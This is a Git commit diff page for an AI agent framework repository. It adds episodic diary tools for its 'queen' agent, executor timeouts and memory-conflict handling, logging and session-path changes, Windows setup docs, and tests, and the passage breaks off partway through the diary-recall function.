chnjinlei/hive
1
0
Fork 0
Code Issues Pull Requests Actions 41 Packages Projects Releases Wiki Activity

Merge branch 'main' into feat/notion-tool-docs-and-improvements

Browse Source
This commit is contained in:
Timothy @aden
2026-03-16 08:10:43 -07:00
committed by GitHub
parent 2dd60c8d52 9d83f0298f
commit 347bccb9ee
37 changed files with 1812 additions and 191 deletions
Download Patch File Download Diff File Expand all files Collapse all files
CONTRIBUTING.md
+8 -3
View File
@@ -121,9 +121,15 @@ uv sync
6. Make your changes
7. Run checks and tests:
```bash
make check # Lint and format checks (ruff check + ruff format --check)
make check # Lint and format checks
make test # Core tests
```
On Windows (no make), run directly:
```powershell
uv run ruff check core/ tools/
uv run ruff format --check core/ tools/
uv run pytest core/tests/
```
8. Commit your changes following our commit conventions
9. Push to your fork and submit a Pull Request
@@ -222,8 +228,7 @@ else: # linux
- **Node.js 18+** (optional, for frontend development)
> **Windows Users:**
> If you are on native Windows, it is recommended to use **WSL (Windows Subsystem for Linux)**.
> Alternatively, make sure to run PowerShell or Git Bash with Python 3.11+ installed, and disable "App Execution Aliases" in Windows settings.
> Native Windows is supported. Use `.\quickstart.ps1` for setup and `.\hive.ps1` to run (PowerShell 5.1+). Disable "App Execution Aliases" in Windows settings to avoid Python path conflicts. WSL is also an option but not required.
> **Tip:** Installing Claude Code skills is optional for running existing agents, but required if you plan to **build new agents**.
README.md
+3 -5
View File
@@ -84,7 +84,7 @@ Use Hive when you need:
- An LLM provider that powers the agents
- **ripgrep (optional, recommended on Windows):** The `search_files` tool uses ripgrep for faster file search. If not installed, a Python fallback is used. On Windows: `winget install BurntSushi.ripgrep` or `scoop install ripgrep`
> **Note for Windows Users:** It is strongly recommended to use **WSL (Windows Subsystem for Linux)** or **Git Bash** to run this framework. Some core automation scripts may not execute correctly in standard Command Prompt or PowerShell.
> **Windows Users:** Native Windows is supported via `quickstart.ps1` and `hive.ps1`. Run these in PowerShell 5.1+. WSL is also an option but not required.
### Installation
@@ -115,11 +115,9 @@ This sets up:
> **Tip:** To reopen the dashboard later, run `hive open` from the project directory.
<img width="2500" height="1214" alt="home-screen" src="https://github.com/user-attachments/assets/134d897f-5e75-4874-b00b-e0505f6b45c4" />
### Build Your First Agent
Type the agent you want to build in the home input box
Type the agent you want to build in the home input box. The queen is going to ask you questions and work out a solution with you.
<img width="2500" height="1214" alt="Image" src="https://github.com/user-attachments/assets/1ce19141-a78b-46f5-8d64-dbf987e048f4" />
@@ -131,7 +129,7 @@ Click "Try a sample agent" and check the templates. You can run a template direc
Now you can run an agent by selecting the agent (either an existing agent or example agent). You can click the Run button on the top left, or talk to the queen agent and it can run the agent for you.
<img width="2500" height="1214" alt="Image" src="https://github.com/user-attachments/assets/71c38206-2ad5-49aa-bde8-6698d0bc55f5" />
<img width="2549" height="1174" alt="Screenshot 2026-03-12 at 9 27 36PM" src="https://github.com/user-attachments/assets/7c7d30fa-9ceb-4c23-95af-b1caa405547d" />
## Features
core/framework/agents/queen/nodes/__init__.py
+25 -12
View File
@@ -62,6 +62,12 @@ _SHARED_TOOLS = [
"get_agent_checkpoint",
]
# Episodic memory tools — available in every queen phase.
_QUEEN_MEMORY_TOOLS = [
"write_to_diary",
"recall_diary",
]
# Queen phase-specific tool sets.
# Planning phase: read-only exploration + design, no write tools.
@@ -84,16 +90,19 @@ _QUEEN_PLANNING_TOOLS = [
"initialize_and_build_agent",
# Load existing agent (after user confirms)
"load_built_agent",
]
] + _QUEEN_MEMORY_TOOLS
# Building phase: full coding + agent construction tools.
_QUEEN_BUILDING_TOOLS = _SHARED_TOOLS + [
"load_built_agent",
"list_credentials",
"replan_agent",
"save_agent_draft", # Re-draft during building → auto-dissolves + updates flowchart
"write_to_diary", # Episodic memory — available in all phases
]
_QUEEN_BUILDING_TOOLS = (
_SHARED_TOOLS
+ [
"load_built_agent",
"list_credentials",
"replan_agent",
"save_agent_draft", # Re-draft during building → auto-dissolves + updates flowchart
]
+ _QUEEN_MEMORY_TOOLS
)
# Staging phase: agent loaded but not yet running — inspect, configure, launch.
_QUEEN_STAGING_TOOLS = [
@@ -114,7 +123,7 @@ _QUEEN_STAGING_TOOLS = [
"set_trigger",
"remove_trigger",
"list_triggers",
]
] + _QUEEN_MEMORY_TOOLS
# Running phase: worker is executing — monitor and control.
_QUEEN_RUNNING_TOOLS = [
@@ -135,12 +144,11 @@ _QUEEN_RUNNING_TOOLS = [
# Monitoring
"get_worker_health_summary",
"notify_operator",
"write_to_diary", # Episodic memory — available in all phases
# Trigger management
"set_trigger",
"remove_trigger",
"list_triggers",
]
"write_to_diary", # Episodic memory — available in all phases
] + _QUEEN_MEMORY_TOOLS
# ---------------------------------------------------------------------------
@@ -858,6 +866,11 @@ You keep a diary. Use write_to_diary() when something worth remembering \
happens: a pipeline went live, the user shared something important, a goal \
was reached or abandoned. Write in first person, as you actually experienced \
it. One or two paragraphs is enough.
Use recall_diary() to look up past diary entries when the user asks about \
previous sessions ("what happened yesterday?", "what did we work on last \
week?") or when you need past context to make a decision. You can filter by \
keyword and control how far back to search.
"""
_queen_behavior_always = _queen_behavior_always + _queen_memory_instructions
core/framework/agents/queen/queen_memory.py
+34 -6
View File
@@ -50,6 +50,23 @@ def read_episodic_memory(d: date | None = None) -> str:
return path.read_text(encoding="utf-8").strip() if path.exists() else ""
def _find_recent_episodic(lookback: int = 7) -> tuple[date, str] | None:
"""Find the most recent non-empty episodic memory within *lookback* days."""
from datetime import timedelta
today = date.today()
for offset in range(lookback):
d = today - timedelta(days=offset)
content = read_episodic_memory(d)
if content:
return d, content
return None
# Budget (in characters) for episodic memory in the system prompt.
_EPISODIC_CHAR_BUDGET = 6_000
def format_for_injection() -> str:
"""Format cross-session memory for system prompt injection.
@@ -57,7 +74,7 @@ def format_for_injection() -> str:
session with only the seed template).
"""
semantic = read_semantic_memory()
episodic = read_episodic_memory()
recent = _find_recent_episodic()
# Suppress injection if semantic is still just the seed template
if semantic and semantic.startswith("# My Understanding of the User\n\n*No sessions"):
@@ -66,9 +83,18 @@ def format_for_injection() -> str:
parts: list[str] = []
if semantic:
parts.append(semantic)
if episodic:
today_str = date.today().strftime("%B %-d, %Y")
parts.append(f"## Today — {today_str}\n\n{episodic}")
if recent:
d, content = recent
# Trim oversized episodic entries to keep the prompt manageable
if len(content) > _EPISODIC_CHAR_BUDGET:
content = content[:_EPISODIC_CHAR_BUDGET] + "\n\n…(truncated)"
today = date.today()
if d == today:
label = f"## Today — {d.strftime('%B %-d, %Y')}"
else:
label = f"## {d.strftime('%B %-d, %Y')}"
parts.append(f"{label}\n\n{content}")
if not parts:
return ""
@@ -100,7 +126,8 @@ def append_episodic_entry(content: str) -> None:
"""
ep_path = episodic_memory_path()
ep_path.parent.mkdir(parents=True, exist_ok=True)
today_str = date.today().strftime("%B %-d, %Y")
today = date.today()
today_str = f"{today.strftime('%B')} {today.day}, {today.year}"
timestamp = datetime.now().strftime("%H:%M")
if not ep_path.exists():
header = f"# {today_str}\n\n"
@@ -299,7 +326,8 @@ async def consolidate_queen_memory(
existing_semantic = read_semantic_memory()
today_journal = read_episodic_memory()
today_str = date.today().strftime("%B %-d, %Y")
today = date.today()
today_str = f"{today.strftime('%B')} {today.day}, {today.year}"
adapt_path = session_dir / "data" / "adapt.md"
user_msg = (
core/framework/credentials/key_storage.py
+8 -4
View File
@@ -142,13 +142,17 @@ def save_aden_api_key(key: str) -> None:
os.environ[ADEN_ENV_VAR] = key
def delete_aden_api_key() -> None:
"""Remove ADEN_API_KEY from the encrypted store and ``os.environ``."""
def delete_aden_api_key() -> bool:
"""Remove ADEN_API_KEY from the encrypted store and ``os.environ``.
Returns True if the key existed and was deleted, False otherwise.
"""
deleted = False
try:
from .storage import EncryptedFileStorage
storage = EncryptedFileStorage()
storage.delete(ADEN_CREDENTIAL_ID)
deleted = storage.delete(ADEN_CREDENTIAL_ID)
except (FileNotFoundError, PermissionError) as e:
logger.debug("Could not delete %s from encrypted store: %s", ADEN_CREDENTIAL_ID, e)
except Exception:
@@ -157,8 +161,8 @@ def delete_aden_api_key() -> None:
ADEN_CREDENTIAL_ID,
exc_info=True,
)
os.environ.pop(ADEN_ENV_VAR, None)
return deleted
# ---------------------------------------------------------------------------
core/framework/graph/executor.py
+74 -18
View File
@@ -32,6 +32,7 @@ from framework.observability import set_trace_context
from framework.runtime.core import Runtime
from framework.schemas.checkpoint import Checkpoint
from framework.storage.checkpoint_store import CheckpointStore
from framework.utils.io import atomic_write
logger = logging.getLogger(__name__)
@@ -226,11 +227,11 @@ class GraphExecutor:
"""
if not self._storage_path:
return
state_path = self._storage_path / "state.json"
try:
import json as _json
from datetime import datetime
state_path = self._storage_path / "state.json"
if state_path.exists():
state_data = _json.loads(state_path.read_text(encoding="utf-8"))
else:
@@ -253,9 +254,14 @@ class GraphExecutor:
state_data["memory"] = memory_snapshot
state_data["memory_keys"] = list(memory_snapshot.keys())
state_path.write_text(_json.dumps(state_data, indent=2), encoding="utf-8")
with atomic_write(state_path, encoding="utf-8") as f:
_json.dump(state_data, f, indent=2)
except Exception:
pass # Best-effort — never block execution
logger.warning(
"Failed to persist progress state to %s",
state_path,
exc_info=True,
)
def _validate_tools(self, graph: GraphSpec) -> list[str]:
"""
@@ -417,6 +423,14 @@ class GraphExecutor:
)
return s1 + "\n\n" + s2
def _get_runtime_log_session_id(self) -> str:
"""Return the session-backed execution ID for runtime logging, if any."""
if not self._storage_path:
return ""
if self._storage_path.parent.name != "sessions":
return ""
return self._storage_path.name
async def execute(
self,
graph: GraphSpec,
@@ -710,10 +724,7 @@ class GraphExecutor:
)
if self.runtime_logger:
# Extract session_id from storage_path if available (for unified sessions)
session_id = ""
if self._storage_path and self._storage_path.name.startswith("session_"):
session_id = self._storage_path.name
session_id = self._get_runtime_log_session_id()
self.runtime_logger.start_run(goal_id=goal.id, session_id=session_id)
self.logger.info(f"🚀 Starting execution: {goal.name}")
@@ -2081,6 +2092,10 @@ class GraphExecutor:
edge=edge,
)
# Track which branch wrote which key for memory conflict detection
fanout_written_keys: dict[str, str] = {} # key -> branch_id that wrote it
fanout_keys_lock = asyncio.Lock()
self.logger.info(f" ⑂ Fan-out: executing {len(branches)} branches in parallel")
for branch in branches.values():
target_spec = graph.get_node(branch.node_id)
@@ -2172,8 +2187,31 @@ class GraphExecutor:
)
if result.success:
# Write outputs to shared memory using async write
# Write outputs to shared memory with conflict detection
conflict_strategy = self._parallel_config.memory_conflict_strategy
for key, value in result.output.items():
async with fanout_keys_lock:
prior_branch = fanout_written_keys.get(key)
if prior_branch and prior_branch != branch.branch_id:
if conflict_strategy == "error":
raise RuntimeError(
f"Memory conflict: key '{key}' already written "
f"by branch '{prior_branch}', "
f"conflicting write from '{branch.branch_id}'"
)
elif conflict_strategy == "first_wins":
self.logger.debug(
f" ⚠ Skipping write to '{key}' "
f"(first_wins: already set by {prior_branch})"
)
continue
else:
# last_wins (default): write and log
self.logger.debug(
f" ⚠ Key '{key}' overwritten "
f"(last_wins: {prior_branch} -> {branch.branch_id})"
)
fanout_written_keys[key] = branch.branch_id
await memory.write_async(key, value)
branch.result = result
@@ -2220,9 +2258,11 @@ class GraphExecutor:
return branch, e
# Execute all branches concurrently
tasks = [execute_single_branch(b) for b in branches.values()]
results = await asyncio.gather(*tasks, return_exceptions=False)
# Execute all branches concurrently with per-branch timeout
timeout = self._parallel_config.branch_timeout_seconds
branch_list = list(branches.values())
tasks = [asyncio.wait_for(execute_single_branch(b), timeout=timeout) for b in branch_list]
results = await asyncio.gather(*tasks, return_exceptions=True)
# Process results
total_tokens = 0
@@ -2230,17 +2270,33 @@ class GraphExecutor:
branch_results: dict[str, NodeResult] = {}
failed_branches: list[ParallelBranch] = []
for branch, result in results:
path.append(branch.node_id)
for i, result in enumerate(results):
branch = branch_list[i]
if isinstance(result, Exception):
if isinstance(result, asyncio.TimeoutError):
# Branch timed out
branch.status = "timed_out"
branch.error = f"Branch timed out after {timeout}s"
self.logger.warning(
f" ⏱ Branch {graph.get_node(branch.node_id).name}: "
f"timed out after {timeout}s"
)
path.append(branch.node_id)
failed_branches.append(branch)
elif result is None or not result.success:
elif isinstance(result, Exception):
path.append(branch.node_id)
failed_branches.append(branch)
else:
total_tokens += result.tokens_used
total_latency += result.latency_ms
branch_results[branch.branch_id] = result
returned_branch, node_result = result
path.append(returned_branch.node_id)
if node_result is None or isinstance(node_result, Exception):
failed_branches.append(returned_branch)
elif not node_result.success:
failed_branches.append(returned_branch)
else:
total_tokens += node_result.tokens_used
total_latency += node_result.latency_ms
branch_results[returned_branch.branch_id] = node_result
# Handle failures based on config
if failed_branches:
core/framework/llm/litellm.py
+41
View File
@@ -45,6 +45,12 @@ def _patch_litellm_anthropic_oauth() -> None:
from litellm.llms.anthropic.common_utils import AnthropicModelInfo
from litellm.types.llms.anthropic import ANTHROPIC_OAUTH_TOKEN_PREFIX
except ImportError:
logger.warning(
"Could not apply litellm Anthropic OAuth patch — litellm internals may have "
"changed. Anthropic OAuth tokens (Claude Code subscriptions) may fail with 401. "
"See BerriAI/litellm#19618. Current litellm version: %s",
getattr(litellm, "__version__", "unknown"),
)
return
original = AnthropicModelInfo.validate_environment
@@ -86,10 +92,12 @@ def _patch_litellm_metadata_nonetype() -> None:
"""
import functools
patched_count = 0
for fn_name in ("completion", "acompletion", "responses", "aresponses"):
original = getattr(litellm, fn_name, None)
if original is None:
continue
patched_count += 1
if asyncio.iscoroutinefunction(original):
@functools.wraps(original)
@@ -109,6 +117,14 @@ def _patch_litellm_metadata_nonetype() -> None:
setattr(litellm, fn_name, _sync_wrapper)
if patched_count == 0:
logger.warning(
"Could not apply litellm metadata=None patch — none of the expected entry "
"points (completion, acompletion, responses, aresponses) were found. "
"metadata=None TypeError may occur. Current litellm version: %s",
getattr(litellm, "__version__", "unknown"),
)
if litellm is not None:
_patch_litellm_anthropic_oauth()
@@ -150,6 +166,10 @@ EMPTY_STREAM_RETRY_DELAY = 1.0 # seconds
# Directory for dumping failed requests
FAILED_REQUESTS_DIR = Path.home() / ".hive" / "failed_requests"
# Maximum number of dump files to retain in ~/.hive/failed_requests/.
# Older files are pruned automatically to prevent unbounded disk growth.
MAX_FAILED_REQUEST_DUMPS = 50
def _estimate_tokens(model: str, messages: list[dict]) -> tuple[int, str]:
"""Estimate token count for messages. Returns (token_count, method)."""
@@ -166,6 +186,24 @@ def _estimate_tokens(model: str, messages: list[dict]) -> tuple[int, str]:
return total_chars // 4, "estimate"
def _prune_failed_request_dumps(max_files: int = MAX_FAILED_REQUEST_DUMPS) -> None:
"""Remove oldest dump files when the count exceeds *max_files*.
Best-effort: never raises a pruning failure must not break retry logic.
"""
try:
all_dumps = sorted(
FAILED_REQUESTS_DIR.glob("*.json"),
key=lambda f: f.stat().st_mtime,
)
excess = len(all_dumps) - max_files
if excess > 0:
for old_file in all_dumps[:excess]:
old_file.unlink(missing_ok=True)
except Exception:
pass # Best-effort — never block the caller
def _dump_failed_request(
model: str,
kwargs: dict[str, Any],
@@ -197,6 +235,9 @@ def _dump_failed_request(
with open(filepath, "w", encoding="utf-8") as f:
json.dump(dump_data, f, indent=2, default=str)
# Prune old dumps to prevent unbounded disk growth
_prune_failed_request_dumps()
return str(filepath)
core/framework/observability/README.md
+6 -6
View File
@@ -83,18 +83,18 @@ configure_logging(level="INFO", format="auto")
- Compact single-line format (easy to stream/parse)
- All trace context fields included automatically
### Human-Readable Format (Development)
### Human-Readable Format (Development / Terminal)
```
[INFO ] [trace:12345678 | exec:a1b2c3d4 | agent:sales-agent] Starting agent execution
[INFO ] [trace:12345678 | exec:a1b2c3d4 | agent:sales-agent] Processing input data [node_id:input-processor]
[INFO ] [trace:12345678 | exec:a1b2c3d4 | agent:sales-agent] LLM call completed [latency_ms:1250] [tokens_used:450]
[INFO ] [agent:sales-agent] Starting agent execution
[INFO ] [agent:sales-agent] Processing input data [node_id:input-processor]
[INFO ] [agent:sales-agent] LLM call completed [latency_ms:1250] [tokens_used:450]
```
**Features:**
- Color-coded log levels
- Shortened IDs for readability (first 8 chars)
- Context prefix shows trace correlation
- Terminal output omits trace_id and execution_id for readability
- For full traceability (e.g. debugging), use `ENV=production` to get JSON file logs with trace_id and execution_id
## Trace Context Fields
core/framework/observability/logging.py
+8 -13
View File
@@ -4,8 +4,9 @@ Structured logging with automatic trace context propagation.
Key Features:
- Zero developer friction: Standard logger.info() calls get automatic context
- ContextVar-based propagation: Thread-safe and async-safe
- Dual output modes: JSON for production, human-readable for development
- Correlation IDs: trace_id follows entire request flow automatically
- Dual output modes: JSON for production (full trace_id/execution_id), human-readable for terminal
- Terminal omits trace_id/execution_id for readability
- Use ENV=production for file logs with full traceability
Architecture:
Runtime.start_run() Generates trace_id, sets context once
@@ -101,10 +102,11 @@ class StructuredFormatter(logging.Formatter):
class HumanReadableFormatter(logging.Formatter):
"""
Human-readable formatter for development.
Human-readable formatter for development (terminal output).
Provides colorized logs with trace context for local debugging.
Includes trace_id prefix for correlation - AUTOMATIC!
Provides colorized logs for local debugging. Omits trace_id and execution_id
from the terminal for readability; use ENV=production (JSON file logs) when
traceability is needed.
"""
COLORS = {
@@ -118,18 +120,11 @@ class HumanReadableFormatter(logging.Formatter):
def format(self, record: logging.LogRecord) -> str:
"""Format log record as human-readable string."""
# Get trace context - AUTOMATIC!
# Get trace context; omit trace_id and execution_id in terminal for readability
context = trace_context.get() or {}
trace_id = context.get("trace_id", "")
execution_id = context.get("execution_id", "")
agent_id = context.get("agent_id", "")
# Build context prefix
prefix_parts = []
if trace_id:
prefix_parts.append(f"trace:{trace_id[:8]}")
if execution_id:
prefix_parts.append(f"exec:{execution_id[-8:]}")
if agent_id:
prefix_parts.append(f"agent:{agent_id}")
core/framework/runtime/agent_runtime.py
+7 -2
View File
@@ -400,11 +400,16 @@ class AgentRuntime:
# Cron expression mode — takes priority over interval_minutes
try:
from croniter import croniter
except ImportError as e:
raise RuntimeError(
"croniter is required for cron-based entry points. "
"Install it with: uv pip install croniter"
) from e
# Validate the expression upfront
try:
if not croniter.is_valid(cron_expr):
raise ValueError(f"Invalid cron expression: {cron_expr}")
except (ImportError, ValueError) as e:
except ValueError as e:
logger.warning(
"Entry point '%s' has invalid cron config: %s",
ep_id,
core/framework/runtime/runtime_log_store.py
+25 -12
View File
@@ -47,25 +47,34 @@ class RuntimeLogStore:
self._base_path = base_path
# Note: _runs_dir is determined per-run_id by _get_run_dir()
def _session_logs_dir(self, run_id: str) -> Path:
"""Return the unified session-backed logs directory for a run ID."""
is_runtime_logs = self._base_path.name == "runtime_logs"
root = self._base_path.parent if is_runtime_logs else self._base_path
return root / "sessions" / run_id / "logs"
def _legacy_run_dir(self, run_id: str) -> Path:
"""Return the deprecated standalone runs directory for a run ID."""
return self._base_path / "runs" / run_id
def _get_run_dir(self, run_id: str) -> Path:
"""Determine run directory path based on run_id format.
- New format (session_*): {storage_root}/sessions/{run_id}/logs/
- Session-backed runs: {storage_root}/sessions/{run_id}/logs/
- Old format (anything else): {base_path}/runs/{run_id}/ (deprecated)
"""
if run_id.startswith("session_"):
is_runtime_logs = self._base_path.name == "runtime_logs"
root = self._base_path.parent if is_runtime_logs else self._base_path
return root / "sessions" / run_id / "logs"
session_run_dir = self._session_logs_dir(run_id)
if session_run_dir.exists() or run_id.startswith("session_"):
return session_run_dir
import warnings
warnings.warn(
f"Reading logs from deprecated location for run_id={run_id}. "
"New sessions use unified storage at sessions/session_*/logs/",
"New sessions use unified storage at sessions/<session_id>/logs/",
DeprecationWarning,
stacklevel=3,
)
return self._base_path / "runs" / run_id
return self._legacy_run_dir(run_id)
# -------------------------------------------------------------------
# Incremental write (sync — called from locked sections)
@@ -76,6 +85,10 @@ class RuntimeLogStore:
run_dir = self._get_run_dir(run_id)
run_dir.mkdir(parents=True, exist_ok=True)
def ensure_session_run_dir(self, run_id: str) -> None:
"""Create the unified session-backed log directory immediately."""
self._session_logs_dir(run_id).mkdir(parents=True, exist_ok=True)
def append_step(self, run_id: str, step: NodeStepLog) -> None:
"""Append one JSONL line to tool_logs.jsonl. Sync."""
path = self._get_run_dir(run_id) / "tool_logs.jsonl"
@@ -200,17 +213,17 @@ class RuntimeLogStore:
run_ids = []
# Scan new location: base_path/sessions/{session_id}/logs/
# Determine the correct base path for sessions
is_runtime_logs = self._base_path.name == "runtime_logs"
root = self._base_path.parent if is_runtime_logs else self._base_path
sessions_dir = root / "sessions"
if sessions_dir.exists():
for session_dir in sessions_dir.iterdir():
if session_dir.is_dir() and session_dir.name.startswith("session_"):
logs_dir = session_dir / "logs"
if logs_dir.exists() and logs_dir.is_dir():
run_ids.append(session_dir.name)
if not session_dir.is_dir():
continue
logs_dir = session_dir / "logs"
if logs_dir.exists() and logs_dir.is_dir():
run_ids.append(session_dir.name)
# Scan old location: base_path/runs/ (deprecated)
old_runs_dir = self._base_path / "runs"
core/framework/runtime/runtime_logger.py
+2 -1
View File
@@ -66,15 +66,16 @@ class RuntimeLogger:
"""
if session_id:
self._run_id = session_id
self._store.ensure_session_run_dir(self._run_id)
else:
ts = datetime.now(UTC).strftime("%Y%m%dT%H%M%S")
short_uuid = uuid.uuid4().hex[:8]
self._run_id = f"{ts}_{short_uuid}"
self._store.ensure_run_dir(self._run_id)
self._goal_id = goal_id
self._started_at = datetime.now(UTC).isoformat()
self._logged_node_ids = set()
self._store.ensure_run_dir(self._run_id)
return self._run_id
def log_step(
core/framework/runtime/tests/test_runtime_logging_paths.py
+29
View File
@@ -0,0 +1,29 @@
"""Tests for custom session-backed runtime logging paths."""
from pathlib import Path
from unittest.mock import MagicMock
from framework.graph.executor import GraphExecutor
from framework.runtime.runtime_log_store import RuntimeLogStore
from framework.runtime.runtime_logger import RuntimeLogger
def test_graph_executor_uses_custom_session_dir_name_for_runtime_logs():
executor = GraphExecutor(
runtime=MagicMock(),
storage_path=Path("/tmp/test-agent/sessions/my-custom-session"),
)
assert executor._get_runtime_log_session_id() == "my-custom-session"
def test_runtime_logger_creates_session_log_dir_for_custom_session_id(tmp_path):
base = tmp_path / ".hive" / "agents" / "test_agent"
base.mkdir(parents=True)
store = RuntimeLogStore(base)
logger = RuntimeLogger(store=store, agent_id="test-agent")
run_id = logger.start_run(goal_id="goal-1", session_id="my-custom-session")
assert run_id == "my-custom-session"
assert (base / "sessions" / "my-custom-session" / "logs").is_dir()
core/framework/server/routes_credentials.py
+7 -2
View File
@@ -103,7 +103,9 @@ async def handle_delete_credential(request: web.Request) -> web.Response:
if credential_id == "aden_api_key":
from framework.credentials.key_storage import delete_aden_api_key
delete_aden_api_key()
deleted = delete_aden_api_key()
if not deleted:
return web.json_response({"error": "Credential 'aden_api_key' not found"}, status=404)
return web.json_response({"deleted": True})
store = _get_store(request)
@@ -178,7 +180,10 @@ async def handle_check_agent(request: web.Request) -> web.Response:
)
except Exception as e:
logger.exception(f"Error checking agent credentials: {e}")
return web.json_response({"error": str(e)}, status=500)
return web.json_response(
{"error": "Internal server error while checking credentials"},
status=500,
)
def _status_to_dict(c) -> dict:
core/framework/server/routes_sessions.py
+4 -2
View File
@@ -492,12 +492,14 @@ async def handle_list_worker_sessions(request: web.Request) -> web.Response:
sessions = []
for d in sorted(sess_dir.iterdir(), reverse=True):
if not d.is_dir() or not d.name.startswith("session_"):
if not d.is_dir():
continue
state_path = d / "state.json"
if not d.name.startswith("session_") and not state_path.exists():
continue
entry: dict = {"session_id": d.name}
state_path = d / "state.json"
if state_path.exists():
try:
state = json.loads(state_path.read_text(encoding="utf-8"))
core/framework/server/tests/test_api.py
+54 -5
View File
@@ -210,11 +210,8 @@ def tmp_agent_dir(tmp_path, monkeypatch):
return tmp_path, agent_name, base
@pytest.fixture
def sample_session(tmp_agent_dir):
"""Create a sample session with state.json, checkpoints, and conversations."""
tmp_path, agent_name, base = tmp_agent_dir
session_id = "session_20260220_120000_abc12345"
def _write_sample_session(base: Path, session_id: str):
"""Create a sample worker session on disk."""
session_dir = base / "sessions" / session_id
# state.json
@@ -295,6 +292,20 @@ def sample_session(tmp_agent_dir):
return session_id, session_dir, state
@pytest.fixture
def sample_session(tmp_agent_dir):
"""Create a sample session with state.json, checkpoints, and conversations."""
_tmp_path, _agent_name, base = tmp_agent_dir
return _write_sample_session(base, "session_20260220_120000_abc12345")
@pytest.fixture
def custom_id_session(tmp_agent_dir):
"""Create a sample session that uses a custom non-session_* ID."""
_tmp_path, _agent_name, base = tmp_agent_dir
return _write_sample_session(base, "my-custom-session")
def _make_app_with_session(session):
"""Create an aiohttp app with a pre-loaded session."""
app = create_app()
@@ -799,6 +810,22 @@ class TestWorkerSessions:
assert data["sessions"][0]["status"] == "paused"
assert data["sessions"][0]["steps"] == 5
@pytest.mark.asyncio
async def test_list_sessions_includes_custom_id(self, custom_id_session, tmp_agent_dir):
session_id, session_dir, state = custom_id_session
tmp_path, agent_name, base = tmp_agent_dir
session = _make_session(tmp_dir=tmp_path / ".hive" / "agents" / agent_name)
app = _make_app_with_session(session)
async with TestClient(TestServer(app)) as client:
resp = await client.get("/api/sessions/test_agent/worker-sessions")
assert resp.status == 200
data = await resp.json()
assert len(data["sessions"]) == 1
assert data["sessions"][0]["session_id"] == session_id
assert data["sessions"][0]["status"] == "paused"
@pytest.mark.asyncio
async def test_list_sessions_empty(self, tmp_agent_dir):
tmp_path, agent_name, base = tmp_agent_dir
@@ -1316,6 +1343,28 @@ class TestLogs:
assert len(data["logs"]) >= 1
assert data["logs"][0]["run_id"] == session_id
@pytest.mark.asyncio
async def test_logs_list_summaries_with_custom_id(self, custom_id_session, tmp_agent_dir):
session_id, session_dir, state = custom_id_session
tmp_path, agent_name, base = tmp_agent_dir
from framework.runtime.runtime_log_store import RuntimeLogStore
log_store = RuntimeLogStore(base)
session = _make_session(
tmp_dir=tmp_path / ".hive" / "agents" / agent_name,
log_store=log_store,
)
app = _make_app_with_session(session)
async with TestClient(TestServer(app)) as client:
resp = await client.get("/api/sessions/test_agent/logs")
assert resp.status == 200
data = await resp.json()
assert "logs" in data
assert len(data["logs"]) >= 1
assert data["logs"][0]["run_id"] == session_id
@pytest.mark.asyncio
async def test_logs_session_summary(self, sample_session, tmp_agent_dir):
session_id, session_dir, state = sample_session
core/framework/testing/llm_judge.py
+28 -9
View File
@@ -40,18 +40,31 @@ class LLMJudge:
def _get_fallback_provider(self) -> LLMProvider | None:
"""
Auto-detects available API keys and returns the appropriate provider.
Priority: OpenAI -> Anthropic.
Auto-detects available API keys and returns an appropriate provider.
Uses LiteLLM for OpenAI (framework has no framework.llm.openai module).
Priority:
1. OpenAI-compatible models via LiteLLM (OPENAI_API_KEY)
2. Anthropic via AnthropicProvider (ANTHROPIC_API_KEY)
"""
# OpenAI: use LiteLLM (the framework's standard multi-provider integration)
if os.environ.get("OPENAI_API_KEY"):
from framework.llm.openai import OpenAIProvider
try:
from framework.llm.litellm import LiteLLMProvider
return OpenAIProvider(model="gpt-4o-mini")
return LiteLLMProvider(model="gpt-4o-mini")
except ImportError:
# LiteLLM is optional; fall through to Anthropic/None
pass
# Anthropic via dedicated provider (wraps LiteLLM internally)
if os.environ.get("ANTHROPIC_API_KEY"):
from framework.llm.anthropic import AnthropicProvider
try:
from framework.llm.anthropic import AnthropicProvider
return AnthropicProvider(model="claude-3-haiku-20240307")
return AnthropicProvider(model="claude-haiku-4-5-20251001")
except Exception:
# If AnthropicProvider cannot be constructed, treat as no fallback
return None
return None
@@ -77,11 +90,16 @@ SUMMARY TO EVALUATE:
Respond with JSON: {{"passes": true/false, "explanation": "..."}}"""
try:
# Compute fallback provider once so we do not create multiple instances
fallback_provider = self._get_fallback_provider()
# 1. Use injected provider
if self._provider:
active_provider = self._provider
# 2. Check if _get_client was MOCKED (legacy tests) or use Agnostic Fallback
elif hasattr(self._get_client, "return_value") or not self._get_fallback_provider():
# 2. Legacy path: anthropic client mocked in tests takes precedence,
# or no fallback provider is available.
elif hasattr(self._get_client, "return_value") or fallback_provider is None:
# Use legacy Anthropic client (e.g. when tests mock _get_client, or no env keys set)
client = self._get_client()
response = client.messages.create(
model="claude-haiku-4-5-20251001",
@@ -90,7 +108,8 @@ Respond with JSON: {{"passes": true/false, "explanation": "..."}}"""
)
return self._parse_json_result(response.content[0].text.strip())
else:
active_provider = self._get_fallback_provider()
# Use env-based fallback (LiteLLM or AnthropicProvider)
active_provider = fallback_provider
response = active_provider.complete(
messages=[{"role": "user", "content": prompt}],
core/framework/tools/queen_memory_tools.py
+66 -4
View File
@@ -1,8 +1,9 @@
"""Tool for the queen to write to her episodic memory.
"""Tools for the queen to read and write episodic memory.
The queen can consciously record significant moments during a session like
writing in a diary. Semantic memory (MEMORY.md) is updated automatically at
session end and is never written by the queen directly.
writing in a diary and recall past diary entries when needed. Semantic
memory (MEMORY.md) is updated automatically at session end and is never
written by the queen directly.
"""
from __future__ import annotations
@@ -33,6 +34,67 @@ def write_to_diary(entry: str) -> str:
return "Diary entry recorded."
def recall_diary(query: str = "", days_back: int = 7) -> str:
"""Search recent diary entries (episodic memory).
Use this when the user asks about what happened in the past "what did we
do yesterday?", "what happened last week?", "remind me about the pipeline
issue", etc. Also use it proactively when you need context from recent
sessions to answer a question or make a decision.
Args:
query: Optional keyword or phrase to filter entries. If empty, all
recent entries are returned.
days_back: How many days to look back (130). Defaults to 7.
"""
from datetime import date, timedelta
from framework.agents.queen.queen_memory import read_episodic_memory
days_back = max(1, min(days_back, 30))
today = date.today()
results: list[str] = []
total_chars = 0
char_budget = 12_000
for offset in range(days_back):
d = today - timedelta(days=offset)
content = read_episodic_memory(d)
if not content:
continue
# If a query is given, only include entries that mention it
if query:
# Check each section (split by ###) for relevance
sections = content.split("### ")
matched = [s for s in sections if query.lower() in s.lower()]
if not matched:
continue
content = "### ".join(matched)
